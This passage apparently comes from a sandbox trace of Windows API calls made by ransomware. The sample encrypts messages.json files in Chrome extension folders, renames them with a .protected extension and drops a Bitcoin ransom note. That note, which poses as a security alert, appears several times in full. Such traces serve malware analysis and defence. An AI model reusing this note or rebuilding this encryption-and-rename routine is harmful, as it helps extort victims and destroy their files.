(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.573] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.573] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.573] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.573] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.574] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.574] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.574] CloseHandle (hObject=0x164) returned 1 [0080.574] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0080.574] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0080.574] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko") returned 141 [0080.574] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0080.574] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0080.574] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\*") returned 143 [0080.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.574] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.574] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.574] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.574] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.574] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.574] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\.") returned 143 [0080.574] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.574] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.574] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.574] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.574] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.574] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.574] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.574] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\..") returned 144 [0080.574] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.574] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.574] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.574] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.574] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json") returned 155 [0080.575] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.575] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.575] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.575] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json") returned 155 [0080.575] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json") returned 155 [0080.576] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.576] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json") returned 155 [0080.576] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.576] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0080.576] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.576] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0080.576] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.576] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.577] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.577] CloseHandle (hObject=0x168) returned 1 [0080.577] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.protected") returned 165 [0080.577] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.protected")) returned 1 [0080.577] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.577] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.577] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0080.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.578] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.578] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.578] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.578] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.579] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.579] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.579] CloseHandle (hObject=0x164) returned 1 [0080.579] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="Windows") returned -1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="Program Files") returned -1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="Program Files (x86)") returned -1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="$Recycle.bin") returned 1 [0080.579] lstrcmpiW (lpString1="lo", lpString2="System Volume Information") returned -1 [0080.579] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo") returned 141 [0080.579] lstrcmpW (lpString1="lo", lpString2=".") returned 1 [0080.579] lstrcmpW (lpString1="lo", lpString2="..") returned 1 [0080.579] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\*") returned 143 [0080.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.579] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.579] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.579] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.579] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.579] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.579] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\.") returned 143 [0080.579] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.579] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.579] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.579] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.579] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.579] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.579] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.579] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\..") returned 144 [0080.579] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.579] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.579] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.579] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.579] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.580] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.580] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.580] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.580] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json") returned 155 [0080.580] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.580] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.580] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.580] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json") returned 155 [0080.580] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json") returned 155 [0080.580] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json") returned 155 [0080.580] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.580] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x1c2, lpOverlapped=0x0) returned 1 [0080.581] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.581] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x1c2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x1c2, lpOverlapped=0x0) returned 1 [0080.581] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.581] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.581] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.581] CloseHandle (hObject=0x168) returned 1 [0080.582] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.protected") returned 165 [0080.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.protected")) returned 1 [0080.582] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.582] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.582] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\RESTORE_FILES.txt") returned 159 [0080.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 